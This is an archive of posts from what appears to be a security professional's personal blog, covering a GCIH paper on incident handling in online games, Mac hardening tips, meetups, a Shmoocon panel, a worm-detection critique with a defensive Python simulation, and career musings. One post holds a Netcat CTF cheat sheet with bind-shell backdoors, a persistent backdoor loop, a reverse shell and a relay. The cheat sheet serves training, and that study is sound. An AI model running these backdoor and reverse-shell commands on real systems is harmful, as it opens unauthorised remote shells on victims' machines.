Showing posts with label education. Show all posts

3.16.2008

How to rescue orcs and spaceships

Hello, my name is Scott, and I'm a gamer. Sometimes it keeps me up way too late at night, but I care about my pretend space ships and the billions of Interstellar Kredits I've earned with them, and I'd be pissed if something happened to them.

A bit nerdy, I realize, even for an information security blog, but it's true. There's no way to deny it: I do enjoy my online games. The fact is, though, I'm far from alone. Millions of people have been getting into one of the many massively multiplayer online games, from World of Warcraft to Second Life, from Lord of the Rings to EVE Online. Millions of people have invested incredible (some would probably say insane) numbers of hours in their wizards, pod pilots, hobbits, and a variety of other characters, constituting a huge investment of both time and money ($15 a month adds up). This became my motivation when I chose the focus of my practical for the GIAC Certified Incident Handler (GCIH) Gold certification.

I've been fascinated by the numerous security exploits in various online games. From EVE Online's database hack to Charlie Miller and Dino Dai Zovi's Second Life exploit, the unique factors that go into handling attacks in multiplayer online games are interesting. On one hand it's very much like a real economy: characters have assets, experience, money of some kind. On the other hand it's very different (you can't exactly roll back a week of financial transactions in the real world).

As a result I've chosen to make my GCIH Gold practical a study of incident handling in online games, focused on case studies of actual incidents handled by various game operations teams. Here's my abstract:


While generalized incident handling practices are essential to any system or network, they do not always meet the needs of specialized systems. These systems have needs that go above and beyond the usual, and must be handled with unique attention to specific hosts, their functions, interactions, and overall system architecture. However, among specialized systems with similar functions there may be a way to generalize even the specialized requirements.

As massively multiplayer online role-playing games (MMORPGs) continue to grow, through games like World of Warcraft, Second Life, and EVE Online, the amount of money being funneled into them grows as well. Where the money goes, so do the criminals, and as such online games are increasingly coming to light as targets for malicious attackers. Whether attacking for financial gain or simply to gain the upper hand in gameplay, more and more vulnerabilities are being discovered and exploited in online games.

MMORPGs are unique environments: worlds with their own economies and populations, players with their own experiences and assets, all of which are unique and important to the users who have invested hours upon hours in their virtual personas. This combination and complexity creates the vibrant and unique environments that make these games interesting to play, but it also creates nightmarish tradeoffs for an incident handler who must respond to a compromise.

This leads to a need for unique handling of incidents, and thus a unique set of processes to be followed. This does not supersede the generalized handling guidelines, nor could it be completely comprehensive, but there can be generalized incident handling guidelines for online games, a superset of the general guidelines such as those taught in the SANS 504 course.

To this end I would like to research and develop such a set of specialized handling guidelines, based on the proven general handling techniques from SANS, for consideration by incident handlers working on massively multiplayer online games. These will focus on the unique challenges and options available to handlers in online games, and will be based in large part on case studies of how such incidents have already been handled in current online games. Additionally it will include a survey of major online games, trying to gain as much insight as possible into how they currently structure their handling, in order to bring as much real-world experience into this effort as possible.

Even though it results in writing a paper and being uber-whitehat, I'm kind of excited about writing this paper. Looking at attacking and defending online games is just beginning to get attention. That is somewhat surprising in itself, since the online gaming industry is already doing billions of dollars yearly and continues growing. Nothing is quite as much fun as breaking new ground.

So now for you, my readers, I have a request: what are your thoughts and insights on my abstract for my paper and on the topic in general? I'm very eager to hear what you have to say. Feel free to leave comments, send email (scott.roberts[at]vulnerableminds[dot]com), or send a carrier pigeon; I'm interested to hear what you have to say.

7.31.2007

All the networking you could need: Netcat

So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber, it ended up being quite a lot of fun, especially for a game that could only last six hours, and it did a fantastic job of bringing the course together. We learned a lot of tools during the class, and playing a scenario-based CTF brought it all together, as many of them were used during the game. Mostly we focused on the old favorites: Nmap, Nessus, John the Ripper; the kind of tools that have been around forever, and for good reason.

We focused mainly on another tool, one I'd known but used little. Called the "network Swiss-army knife," Netcat proved, as Ed promised us, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that. I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50, in case you were wondering), just to get any other Netcat neophytes started and possibly remind some old hands of some fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistent Backdoor:
while [ 1 ]; do nc -l -p [port] -e /bin/sh; done

Reverse Shell:
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0<backpipe | nc [target ip] [target port] 1>backpipe

Traffic Replay:
nc [targetip] [port] < [filename]

A couple of caveats before you try these outside the classroom. The -e option only exists in Netcat builds compiled with GAPING_SECURITY_HOLE (the traditional Hobbit netcat and the Windows nc.exe); the OpenBSD netcat that some systems ship leaves it out entirely and takes the listening port as a bare argument rather than with -p. The file transfers carry no integrity check, so compare an md5sum on both ends before trusting the copy. In the relay, the first nc reads the inbound connection and feeds the second nc through the pipe, and the second nc's replies come back through the backpipe FIFO, which is why the FIFO has to be created first.
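The relay is the one line on the list that does not explain itself, so here is the same job spelled out with Python sockets. This is an added example, not code from the post or from the SANS course materials. The upper-casing "target" is a constructed stand-in so the whole thing runs on localhost, and the ports are picked by the kernel instead of the [incoming port] and [target port] placeholders above.

```python
import socket
import threading


def pipe(src, dst):
    # Copy bytes from src to dst until src hits EOF, then pass the EOF along by
    # half-closing dst. That is what the two nc processes joined by the FIFO do.
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_one(listener, target_host, target_port):
    # Accept a single inbound connection and splice it to the target in both directions.
    client, _ = listener.accept()
    listener.close()
    upstream = socket.create_connection((target_host, target_port))
    threads = [threading.Thread(target=pipe, args=(client, upstream)),
               threading.Thread(target=pipe, args=(upstream, client))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    client.close()
    upstream.close()


def start_relay(target_host, target_port, listen_host="127.0.0.1"):
    # Bind an ephemeral port (0 lets the kernel choose) and relay one connection in the background.
    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((listen_host, 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=relay_one, args=(listener, target_host, target_port), daemon=True)
    t.start()
    return port, t


def start_upper_target(host="127.0.0.1"):
    # Constructed stand-in for the real target: echoes everything back upper-cased.
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return port


def relay_demo(payload=b"hello through the relay"):
    # client -> relay -> target and back again; returns what the client received.
    target_port = start_upper_target()
    relay_port, relay_thread = start_relay("127.0.0.1", target_port)
    with socket.create_connection(("127.0.0.1", relay_port)) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # same as nc seeing EOF on its stdin
        chunks = []
        while True:
            data = c.recv(4096)
            if not data:
                break
            chunks.append(data)
    relay_thread.join(timeout=5)
    return b"".join(chunks)


if __name__ == "__main__":
    print(relay_demo())
```

The one thing this version does that the FIFO pair does not is pass EOF in each direction independently with a half-close, so neither side hangs waiting for the other to finish.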

A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.

7.29.2007

At least we're learning

I've spent the past few days taking the SANS 504 course: Hacking Techniques, Exploits, and Incident Handling. I was lucky enough to have the course creator, Ed Skoudis, as my course instructor. I don't know if I know anyone who seems to have Ed's combination of breadth and depth in the information security field. I guess that's how you become one of the senior handlers at the SANS Internet Storm Center.

I plan on doing a write up of my class and what the Vulnerable Minds have been up to for the past few weeks. A short update:

  • I've been in training, busy at work, and abusing Yahoo Pipes, something I'll write more about later.
  • Bacchus has stopped reading anything but Snort alerts, which made Bacon a bit anxious so I think he's trying to make up some new encrypted communication channel. I may help with that a bit.
  • ev3 has been reversing everything she gets her hands on including, I'm pretty sure, her reversing tools.
  • No one's really sure what Narc, GPmidi, Norris, or LogicX have been doing, but that's probably a good thing.
  • Saijak seems to have forgotten how to use a computer, though with good reason.
Regardless, we're all getting stoked for Defcon and various Minds will be making it out there Thursday and Friday. We'll be in the Riviera and around various places. More about our plans to come.

By the way check out Ed's incident handler challenges, fun stuff.

5.23.2007

Getting Involved: CitySec, OWASP, and SUGs! O MY!

It's been an amazingly busy time for the Vulnerable Minds. Plans for Defcon, CTF, Projects, papers, all of them are sucking up time. I have had multiple blog posts in the queue waiting to be finished and posted in all their glory, but I wanted to make a quick post to highlight something that's been important to me lately.

The image of the lonely hacker in a basement is quickly disproved as soon as you meet the very social characters that make up most of the hacking community. As happy as they are sitting around hacking on a neat piece of code, they're just as happy going out for a beer and talking about that piece of code with others who share their interests. Any conference is as much about the old friends you meet up with and the new friends you'll make as it is about the technical knowledge you'll gain.

Cons are, depending on your travel schedule and availability, few and far between for most and as a result smaller interest groups have been forming all over the country to support the desire many hackers/infosec professionals have to mix with their peers, share ideas, network, socialize, and just generally cause trouble. Much like 2600 a few years ago these groups seek to give people those opportunities.

Thomas Ptacek has been a huge proponent of these groups, and as such has organized CitySec, a small bulletin board meant to help form and nurture such groups, which I've been happy to be involved in, advocating a Washington DC meetup. Well before the CitySec site was even live, Richard Bejtlich, along with other security professionals, started NoVASec (Northern Virginia) as a group where those interested in pure security, less in discussing their CISSP numbers and GIAC scores and more in what they're actually doing, could meet and talk about security. NoVASec has been excellent, just a bit of a stretch to get to as it's usually fairly far outside Washington DC proper.

Many other groups are also meeting regularly. OWASP has regular meetings, such as those in Washington DC, in various cities for developers, admins, and security folks interested in web app security. For those more of the CISSP/security management mindset there are groups like ISSA-NoVA. The black or grey hat oriented crowd still has more than a few chapters of 2600 that still seem to meet, though I gather they're waning a bit. I'm also known to show up at a Snort Users Group meeting or two, though sadly the NoVA group hasn't had a meeting in a few months. Even many colleges are getting involved, with groups like the Penn State Information Assurance Club, and a similar club at RIT whose name I completely fail to remember.

I guess what I'm trying to say is that it's great to see the community that's coming up around various areas of the security field, and I've been happy to get involved, and encourage others in the security community to do the same. I speak from experience when I say many of them are just as much fun as the larger conferences, and make great places to make new friends, make contacts, have a good beer, and occasionally learn something.

5.19.2007

Time for a Tango

Well I've had a number of people curious about Project Tango. It's been going for a little over a week now, much of the initial work has been completed, and now I'm in the process of tuning some of the back end pieces for finalization and release.

So at this point I'm asking for some help, and in the process am going to give away a few things about the project, so here ya go:

  • Are you a security professional who's an information junkie? Shoot me an email and let me know what you look for in getting your fix. What sites you read, what information you want, what information you don't want, and if you'd be interested in the Tango Beta.
  • Are you a security professional using RSS to feed your information needs, whether addict level or more of a recreational RSS user? Shoot me an email, pet peeves, wants, information you don't or can't get via RSS, and if you'd be interested in the Tango Beta.
  • Are you just really curious about what Project Tango is and want to make a compelling case to get in on the beta? Shoot me an email.
All email can be sent to tango.beta@vulnerableminds.com and we'll set you up for an early look at Project Tango.

4.29.2007

A Safer Apple Experience per Grandma Roberts

In these days where everyone is getting worked up over OS X vulnerabilities it's somewhat easy to not know quite how to respond. I love my grandmother partially because, even though she may not read all the warnings on the SANS Internet Storm Center or read John Gruber's surprisingly enjoyable and fair interview with Dino Dai Zovi, she will email me anything she sees on CNN.com or gets via email about computer security. It's really quite touching and means a lot that she cares enough to take an interest in what I do.

It also throws some things into a different perspective for me. I often ask myself how this, be it a new vulnerability or defensive technology, would impact my grandmother. Now I've heard of this technique used to shift paradigms and gain a better understanding of a technology, but for me it's also protection, since I never know when my next call to Grandma could turn into "So Scott, is my Mac going to get broken into?"

What can I say? My grandma is a proactive person. It puts a lot of pressure on a guy. I'm used to explaining the newest vulnerabilities, exploits, worms, and attack techniques to a cadre of some of the finest information security analysts in the world. I'm used to producing technical write-ups that go to highly skilled information security teams all over the world. Explaining how Dino D's exploit will impact my grandmother? Much more complicated. It can't be a "O don't worry, it'll be fine Grandma, I promise." No sir. Last time I tried that was over a printer, and so insistent was my grandmother on getting it sorted out herself that I ended up wearing half a cartridge of printer ink. So if Grandma gets wind of this I have to be prepared not just to explain what's going on and its impact, but also how Grandma can mitigate the issue for herself.

I figure such things might also be useful to the community in general. Perhaps you have a grandparent or parent with a similar iron will and determined interest. Perhaps you're just curious. Here goes.

Scott's Guide to Securing Grandma's Mac:
  • Disable the automatic "Open 'Safe' files after download." in Safari.
  • Disable Java in Safari.
  • Turn on the Firewall.
  • Stop using the Administrative Account for day to day stuff.
  • Use strong passwords on all user accounts.
  • Give Keychain a different password than your user password.
  • Turn on Filevault.
There ya go. That's the basics, as per Scott Roberts and, even though he may not remember it, Timothy Martin. Most of those steps, though very similar to those Dino himself recommended, were pulled from a presentation Tim and I gave as the Security Geniuses for the Penn State Mac Users Group more than two years ago. Oddly enough they're still relevant. Some things never change.

Not enough for you? You want more Mac security goodness? O well I've got that too:
There ya go. That's four different ways to lock down your Mac. Are they perfect? No, not quite, but as fellow Vulnerable Mind Rolf constantly says "You're only 'secure' in a single moment. Staying secure is a process." Wise words from the Vulnerable Minds elder.

4.24.2007

My Lunchtime Hack

If you're anything like me and you have a lot on your plate at work you may be inclined, as I often am, to take lunch at your desk. It's a common thing and often lets me get extra things accomplished without staying later than I already do. Still there is something to relaxing a bit away from the office when I usually go out to lunch.

I've since found a respite to go with whatever I packed for lunch. At the recommendation of al3x I started checking out Google's TechTalks. Described by Google as "...designed to disseminate a wide spectrum of views on topics ranging from Current Affairs, Science, Engineering, Humanities, Business, Law, Entertainment, Medicine, and the Arts," and it lives up to it. More than a few are even security related, and not by just any script kiddies.



So I recommend getting your sandwich/salad/whatever, putting on some headphones, and really learning something next time you have a few minutes.

3.10.2007

Speakin' at Shmoocon

Well, it's official now. From Shmoocon.org:

A Plenary Session on the Security and Social Impact of the One Laptop Per Child program

The Children's Machine, also known as the XO-1 and previously as the $100 Laptop, is a low-cost, power-efficient and durable machine developed by faculty members of the MIT Media Lab at the One Laptop per Child non-profit organization (OLPC). The laptop's purpose is to redefine learning for children in developing countries, particularly those living in the most remote areas and in the poorest of countries, by providing them with access to knowledge and modern forms of education. The laptops contain flash memory instead of hard drives and use a custom operating system based on Fedora Core Linux, which includes a new security architecture called Bitfrost. They are built to utilize wireless mesh networking, a form of mobile ad-hoc networking, to allow machines to communicate without requiring configuration by the user. The laptops will be sold to governments and issued to children by schools on the basis of one laptop per child.

What may be the consequences of such a massive distribution of computers to children in developing nations? A much larger Internet population in a few short years appears to be a certainty. Will tens or hundreds of millions of computers running Linux drastically alter the computer security landscape? What is the potential for the laptops to be abused by criminals or closed and oppressive governments? And how will the Internet affect millions of children who find themselves with access to a world decades ahead of their own culture?


Bio: Sean Coyne

Beginning his career as the only Business School member of Penn State's NSA Center for Information Assurance Excellence, Sean is now a sought-after consultant at Booz Allen Hamilton specializing in Information Security for government clients. Sean's technical know-how coupled with a big picture view has led him to help found the Vulnerable Minds think tank, studying the impact of information security on society.

Bio: Ivan Krstic

LiveJournal doesn't have an angry mood anymore, as Ivan Krstić used it all up. Ivan has been angry on all seven continents.

Bio: Jason Scott

Jason Scott runs TEXTFILES.COM, an online collection of the last 30 years of Bulletin Board System-era history, files and artifacts. He is also the director of "BBS: The Documentary" (www.bbsdocumentary.com), a 3-DVD, 8-episode documentary about the BBS, a project 4 years in the making. He has begun production on GET LAMP (www.getlamp.com), a documentary on text adventures. He speaks on topics of computer history and social commentary at various conferences, including Shmoocon 2006, where he presented a history of hacker conferences. Jason currently lives in Massachusetts, and is secretly in love with Bruce Potter.

Bio: Scott Roberts

An up and coming member of the DC InfoSec community. Scott began his interest in Information Security trying to get access to the Internet in 9th grade computer classes and it has led him to a position as a Global Security Analyst at Symantec Managed Security Services. Along with Vulnerable Minds, a think tank he helped found, Scott is also involved in various projects involving Snort, large scale architectures, and teaching information assurance.

I'm not gonna lie, Sean and I are stoked. This is really shaping up to be a great talk. Jason Scott has done some really great talks before at Shmoocon, Defcon, and others. Not to mention any guy making a profession of love to Bruce Potter can't be bad at all, just amusingly crazy. He's teaming up with Sean to take a look at the sociological, economical, and other -ical type things that will come up with the OLPC.

Ivan Krstic, as I have mentioned before, is an unbelievably smart gentleman, not that it's a surprise, I mean he did design Bitfrost (which will be a major topic of our panel). As much as I'm looking forward to speaking with him I'm equally excited to just get the chance to pick his brain as one of the most out of the box people in computer security.

Sean... well I see him most days, but he does have a lot of great angles on this quite interesting issue. It'll be great to hear what he comes prepared with, and even better to hear what he does with the various questions that I'm sure will be thrown his way.

As for my piece, I'm planning on tag teaming the technical end of things with Ivan, looking at the implications of such technology on the security space. There is so much to cover around this: for the kids with the laptops, for the world at large, and what lessons can be learned.

It should be a great panel and I'm honored to be with such an esteemed group. So track us down at Shmoocon. I'll be doing another post on Shmoocon later this week, but regardless track me down to say hi. I'll be the loud guy with the short hair and the speaker's pass. If you're lucky you may even get one of the new Vulnerable Minds business cards (Thanks again Timoni! The new logos look great!).

3.01.2007

The Early Bird

A recent Information Week article discusses the research efforts of someone near and dear to the thoughts of many Vulnerable Minds contributors: Peng Liu. Dr. Liu taught many of us during our tenure at Penn State, and was also our adviser as we started the Information Assurance club and Security Competition team. Now, he and his colleagues have filed for a patent on a new "worm stopping technology." This new creation from the department of IST "focuses on analyzing packet rate and frequency of connections, rather than signature or pattern identification."

While it is true that I was working with him at the same time as his work on this project, and I did pass on the opportunity to contribute, I still don't know much about the idea and would like to ask some probing questions to gauge community thoughts.

When I was new to the field I once asked, "Why don't we put some type of filter in place that notices a rapid escalation in traffic to or from a particular IP or port and we can stop (D)DoS attacks?" One of the replies I got was that it would quickly overwhelm the filter and we'd be back to square one. My question then is, why does the same principle not apply here? Dr. Liu points out that the Slammer worm sent out 4,000 packets per second. Part of the purpose of a worm is to cause a huge slowdown of the Internet by clogging up the tubes - I imagine these filters would take a serious hit pretty quickly.

Second, a worm does not need to send out an astronomical number of packets in a short amount of time to spread. Granted, it may not spread as quickly, but it will also pass through more quietly. Would a worm that implements this technique fall through the cracks with the new Penn State technology?

Finally, this is an anomaly based detection approach, and given the background of those involved I would guess it is more strict and mathematically based rather than AI-based (although it does mention a degree of intelligence: auto-unblocking mistakenly blocked hosts). Strict anomaly based detection is notoriously unreliable and inaccurate, what makes this any different? How is the baseline for normal established, how is the deviation measured, and perhaps most importantly, how is a "mistakenly blocked host" determined on the fly?

Note that it's not that I disagree with the premise, I'm just conducting a little vetting of the idea and attempting to learn more about it. I'm very glad to see something (perhaps) groundbreaking come from the many tens of thousands of dollars my friends and I gave to that school. Here's to not hearing the last of this. Cheers!
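To make the second question concrete, here is a minimal rate-based blocker of the kind the article describes: a per-source sliding window, a fixed threshold, and timed auto-unblocking. It is an illustration added here, not anything from Dr. Liu's patent, and the threshold, window, and block duration are assumed values. Run against a constructed Slammer-like source at 4,000 attempts per second and a slow spreader at 10 per second, it shows the point: the fast one is blocked within a few milliseconds, the slow one opens 300 connections and never trips it.

```python
from collections import defaultdict, deque


class ConnectionRateDetector:
    """Block a source that opens more than `threshold` connections inside any
    `window`-second span; the block lifts on its own after `block_for` seconds.
    Threshold, window and block duration are assumed values, not the patent's."""

    def __init__(self, threshold=50, window=1.0, block_for=60.0):
        self.threshold = threshold
        self.window = window
        self.block_for = block_for
        self.recent = defaultdict(deque)  # src -> timestamps of recent attempts
        self.blocked_until = {}           # src -> time the block expires

    def is_blocked(self, src, now):
        # Auto-unblock: a block is just an expiry timestamp that has not passed yet.
        until = self.blocked_until.get(src)
        if until is None:
            return False
        if now >= until:
            del self.blocked_until[src]
            return False
        return True

    def observe(self, src, now):
        """Record one connection attempt from src at time now (seconds).
        Returns 'allowed' or 'blocked'."""
        if self.is_blocked(src, now):
            return "blocked"
        q = self.recent[src]
        q.append(now)
        while q and now - q[0] > self.window:  # slide the window forward
            q.popleft()
        if len(q) > self.threshold:
            self.blocked_until[src] = now + self.block_for
            q.clear()
            return "blocked"
        return "allowed"


def simulate(detector, src, rate_per_s, duration_s):
    """Feed evenly spaced attempts at rate_per_s for duration_s seconds.
    Returns (allowed, blocked) counts. The traffic is constructed, not captured."""
    allowed = blocked = 0
    for i in range(int(rate_per_s * duration_s)):
        if detector.observe(src, i / rate_per_s) == "allowed":
            allowed += 1
        else:
            blocked += 1
    return allowed, blocked


if __name__ == "__main__":
    det = ConnectionRateDetector()
    # Slammer-like source: 4,000 attempts/s for a tenth of a second.
    print("fast worm (allowed, blocked):", simulate(det, "10.0.0.1", 4000, 0.1))
    # Slow spreader: 10 attempts/s for 30 s, 300 connections and never blocked.
    print("slow worm (allowed, blocked):", simulate(det, "10.0.0.2", 10, 30))
    print("fast still blocked at t=59s:", det.is_blocked("10.0.0.1", 59.0))
    print("fast unblocked at t=61s:", det.is_blocked("10.0.0.1", 61.0))
```

The second simulation is the whole argument: any worm that paces itself under the threshold walks straight through, and lowering the threshold far enough to catch it starts blocking busy legitimate hosts, which is exactly where the "mistakenly blocked host" logic has to earn its keep.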

2.10.2007

Quick Note

Ivan Krstic is scary smart. That is all.

2.06.2007

I Dvorak

The grand experiment has begun. After Steve's wonderful diatribe on his good experience with Dvorak, reading the Dvorak zine (comic book style), and after hearing the same for months from al3x, I've jumped in and taken the Dvorak plunge. Friday afternoon, sitting around Murky, I pulled out my trusty little pocket knife/bottle opener and proceeded to painstakingly scrape all the relevant letters off my iBook's keyboard.

Now I don't do well with tedious things, but taking the time to scrape each little letter off all those keys was good preparation for my first few minutes of typing. I'm not going to pretend it wasn't frustrating, because it was. Everything you've been taught, everything you've trained on, all different.

Slowly though, things got better. I visited the Dvorak zine website and found a lot of great resources that helped me through the initial stages. First I popped onto their Downloads page and downloaded the Dvorak wallpaper, which makes for a very handy reference, especially when combined with Exposé.

Now it's two weeks later.....

I'm an undisciplined slob. The wallpaper is still up, my keys are letterless, but I'm still typing QWERTY. This weekend I take another crack, hopefully getting in the practice I wasn't able to get in last time. I still need to be functional at work. Hopefully my practice this weekend will help, but with so much to do it's not really the best time to start typing like a dyslexic 3rd grader. Maybe there never is a good time though.

Any tips from anyone?

12.20.2006

The Degree Debate - Is a degree necessary in tech?

This post is a little close to the vest (is that the actual phrase?) so I'm not quite sure where it's gonna go.

As I state quite freely in the 'About Me' bit on my blog, I have not yet fully completed my Bachelor of Science degree in Information Sciences and Technology from Penn State. It's close, only 10.5 credits away.

The Breakdown:
- 3 credits of IST331 - An Introduction to Human/Computer Interaction.
- 3 credits of either IST412 (Structured Programming) or IST413 (User Interface Design).
- 3 credits of IST440w - IST Senior Capstone Class.
- 1.5 credits of Kinesiology (aka Gym Class).

I planned on finishing all these requirements this past fall, taking a ninth semester. This choice was made last spring, and a week after, I got my job offer from my present employer. After deliberation I decided it was too good an offer to pass up, and so here I am outside our nation's capital, doing my thing.

Ever since then everyone and their brother (or more often mother) has harped on me about how important it is that I get my degree. I hear reasons like "You're so close!" or "You'll only go so high without a degree!" or "What if you lose your job?" day in and day out. I'm already wondering how many conversations I have with my family this Christmas will be 3 minutes about my new job and 7 minutes having a family member, who most likely is making less money than I do with lower job security and multiple mouths to feed, lecturing me about how I'm in an unstable situation and need to finish my degree.

The more I think about it, I just want to turn to them all and ask "Do I really? I'm not so sure I really do." Honestly I'm not convinced. I have a few reasons for this. The computer industry is not the business industry of the 1980s. A Bachelor's degree is not a magic ticket. While there are many talented people in this business who have degrees, there are nearly as many equally talented people who don't have them. Nicholas Negroponte is building his own computer to change the world, and he has a PhD. Bill Gates and Steve Jobs also built their own computers that changed the world, and they were dropouts. Bruce Schneier, who is (or was, depending on whom you ask) a leader in the security field, holds a Master's in computer science from American University. H.D. Moore is also a leader in the security field and as far as I can tell never went to college at all. Even closer to home I have good friends who are leaders in the computer security world, some with degrees, many without.

Since it seems to have little to do with my overall success in my chosen field I always question what will a degree do to benefit me? If you scroll back up and look again at the classes I'm going to have to take I think you'll agree that they aren't really relevant to my career path. IST440w especially seems stupid, since the whole point is to prove you can survive in the business world. Guess what, I think I'll be ok. Maybe it's the gym class that I need.

Now that I've ranted enough about this I'm going to admit that I do plan to finish my degree soon. The combined forces of being so close, having an employer who will pay for it, the desire to be a professor someday (and thus needing a PhD to go with a BS), and my parents' wishes are too much for me to fight against. I'm still not convinced it's necessary, nor a real boon in the InfoSec/computer field anyway.

I'd love to hear various people's thoughts on this. Do you think a degree has helped or will help you? What skills do you think you gained in an educational environment that will help you in business? What gym class should I take? These are all important questions, and I hope some of you, my readers, will take the time to answer them.